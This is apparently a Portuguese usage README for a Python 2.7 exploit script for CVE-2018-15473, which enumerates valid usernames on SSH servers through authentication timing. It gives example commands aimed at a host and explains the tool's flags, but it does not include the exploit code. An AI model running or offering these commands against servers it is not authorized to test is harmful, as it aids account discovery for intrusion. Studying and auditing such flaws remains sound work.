
Exploit do CVE-2018-15473
Você precisará do Python 2.7 para usar este exploit. Instale todos os módulos listados abaixo no Python 2.7.
Exemplo: python2 -m pip install numpy python2 -m pip install paramiko python2 -m pip install property
Para testar um único nome de usuário, use este comando: python ./sshuserenumeration.py -u
Exemplo: python ./sshuserenumeration.py -u root site.com
Para testar vários nomes de usuário com um arquivo de lista, use este comando: python ./sshuserenumeration.py --userlist <name_list.txt>
Exemplo: python ./sshuserenumeration.py --userlist users.txt site.com
uso: sshuserenumeration.py [-h] [-u USER | -U USERLIST] [-e] [-s] [--bytes BYTES] [--samples SAMPLES] [--factor FACTOR] [--trials TRIALS] host
argumentos posicionais: host Informe o endereço do servidor SSH como ip:porta ou apenas o ip
argumentos opcionais: -h, --help mostra esta mensagem de ajuda e sai -u USER, --user USER Informe um único nome de usuário -U USERLIST, --userlist USERLIST Informe um arquivo contendo uma lista de usuários -e, --enumerated Mostra apenas os usuários enumerados -s, --silent Como -e, mas apenas os nomes de usuários serão escritos no stdout (sem banner, sem nada) --bytes BYTES Envia tantos BYTES para o daemon SSH como senha --samples SAMPLES Coleta tantas AMOSTRAS para calcular uma linha base de temporização para autenticação de usuários inexistentes --factor FACTOR Usado para calcular o limite superior de temporização para enumeração de usuários --trials TRIALS Tenta autenticar o usuário X por TRIALS vezes e compara a média das temporizações de autenticação com o limite de temporização